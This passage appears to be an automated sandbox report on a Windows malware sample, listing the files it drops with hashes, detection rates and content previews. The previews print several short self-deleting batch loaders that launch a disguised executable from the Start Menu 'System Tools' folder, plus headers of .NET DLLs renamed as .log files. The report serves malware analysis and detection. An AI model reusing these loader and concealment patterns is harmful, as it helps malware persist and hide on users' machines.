                                                        SHA-512:641E9B39AFD770F5F9BB2A9D0A634B665D673E15E5554ED1CDEB80816648EBBAA977C19AFDC766A5C993123AFD9EF81BDB848455C344FA07FB272867CFC4B891
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uHdcbfRrII.bat"

                                                        C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.286508226551442
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fPH:HTg9uYDEiHAJI3H
                                                        MD5:C12DB08830F56326F9316B6F5BF253E7
                                                        SHA1:C2AD9FE9D34D61733595EB6CE53BB6A64126E399
                                                        SHA-256:D4FCFCCEA22CAD5BB0B128F7CACB5FAAA0F944FC53E1ADE7DB1E0848E07697DA
                                                        SHA-512:92A33FADAC634A4D8C90A16C67E720D450D516B6E90CEEA7B5CD8CFDBFFDA272188B058D137680F570BFE2A8E09A0FEAE8B6BC3C69F83F133B6A90B25BE152CC
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yFJPVaLwHB.bat"

                                                        C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.262274935702472
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fg:HTg9uYDEiHAJIY
                                                        MD5:9E834F480DF6C7A8E6DA65C4EF5BA915
                                                        SHA1:ED3AD26BBEA9823ECA18D8A5111F9CD81D433F5B
                                                        SHA-256:D3C34BB9F32046481C32E8345C20F19E4277299659B58B48DF6E3DEBA159AE87
                                                        SHA-512:4536C449EFB285B44DF4586CFD23C86FFEE3682A4B9E13D45030B7A4F9868F459ED0996CFBC078D6B4B83417CA489F5012CA8945EE64694C0C0E55F152C5FA49
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ybJBPcXt9a.bat"

                                                        C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.27696820394485
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fhQRHn:HTg9uYDEiHAJIKRH
                                                        MD5:1C7FB64D63FC8129E944BF072657BB9E
                                                        SHA1:3F6AD78CF29797D6B61120D6BF9CE98FA85F36E0
                                                        SHA-256:1947F616EA17AE251111BF8139CAAD852F0E5DDAB92A0A7E8C80965209F6BAE2
                                                        SHA-512:1A61BE834998E811034B6984AC8B3D6AD89DDC4421C0FB344D2D6842EABE31864A2C96A2FFBF5693CDA39BFA7CA1A14857B17267F46893934DB9A8BC6AC71617
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\znx0BCuWHE.bat"

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\81acb8af1bb493

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (442), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):442
                                                        Entropy (8bit):5.871430465875405
                                                        Encrypted:false
                                                        SSDEEP:12:NLOqHq2YAywpk2rze1jjtHS50TY/PgQd87f:VOqHq2z7pj3MjjtHSCTsPZ6
                                                        MD5:70550185C6FFF6621875B76399AE6346
                                                        SHA1:A8129ACF71C30C5D8661E7BDE730F7E6F4BF381C
                                                        SHA-256:D9098D7CAD06BF3A20B9649926FFDC40BCA574C82AF6F13197B738021C17C145
                                                        SHA-512:EFD1A394BCD1F05BD19671BC4B387F306769F6A1146CD2BE2034D54DB5AD41E1F9EFD5F2110CE35FCFF3AFBDB82CC6926EF412CF306CC4E2748E43E6CDBA20C1
                                                        Malicious:false
                                                        Preview:R1dyn3DMzoJlPOlKLlcnICgQhzhHXtzpNSs47Z2H3NVuYRCqKn8TlISPUNRyW5yGydX7grNwtVt4qw1Qx07tugEF9cjtHDu8ZP653FKdaMjPYXjiWBBg8FVSZS7DIdopkvfaz5XspdTi7yrm3AXGCOAT3ofkHGV6h3pm2IsaoT0evxUkkVKHGinVvLgLZwkjIXADJEuuR7ctXfiGT49v6N09QT1qlhA1sRWYwRbglZ0IG37Pna2ewzn4hBxzNDIu6kBGJJTCddKgWr2WVmCLofF3ob1udmShQGMg21GdG0BToGhzJadlB7FbfHcrSii0KmPQfWeefiExdvOh4BlCIrgTAuBuYYLhSKIC1RUw69Fc2R7t35xQ7fsdF6PuVuFHXhfSnLpnryGIlDatxR0dl4kwco65BkbM48FVvoFrPJjIZk1Cfg6D3lfc6t

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@...................................;.K.....<.p.................... <...................................................... ............... ..H............text...T.;.. ....;................. ..`.rsrc...p.....<.......;.............@....reloc....... <.......;.............@..B................0.;.....H..................o.........1.z.;......................................0..........(.... ........8........E........*...N.......8....*(.... ....~w...{t...:....& ....8....(.... ....~w...{r...9....& ....8....(.... ....~w...{....:....& ....8y......0..)....... ........8........E................>...........8....~....9.... ....~w...{....9....& ....8.......... ....8....~....(N... .... .... ....s....~....(R....... ....~w...{....:e...& ....8Z...8*... ....~w...{....:A...& ....86...r...

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\Desktop\AQotzTRR.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Joe Sandbox View:
                                                        • Filename: FuWRu2Mg82.exe, Detection: malicious, Browse
                                                        • Filename: auXl1Tzyme.exe, Detection: malicious, Browse
                                                        • Filename: oLlotc8NO3.exe, Detection: malicious, Browse
                                                        • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                        • Filename: w49A5FG3yg.exe, Detection: malicious, Browse
                                                        • Filename: 9XHFe6y4Dj.exe, Detection: malicious, Browse
                                                        • Filename: 12Vjq7Yv2E.exe, Detection: malicious, Browse
                                                        • Filename: 7WyBcig6e3.exe, Detection: malicious, Browse
                                                        • Filename: kBY9lgRaca.exe, Detection: malicious, Browse
                                                        • Filename: lv961v43L3.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ASPeVAWX.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\AVHMeQAt.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\AWpwsIZS.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\AefMODTq.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ApHNCCYS.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BGEGNIeN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BMbUPQnU.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BQYWEsJr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BSjUAQPo.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BVbCJhtL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\BWJmXZSj.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\BmiVXCnN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
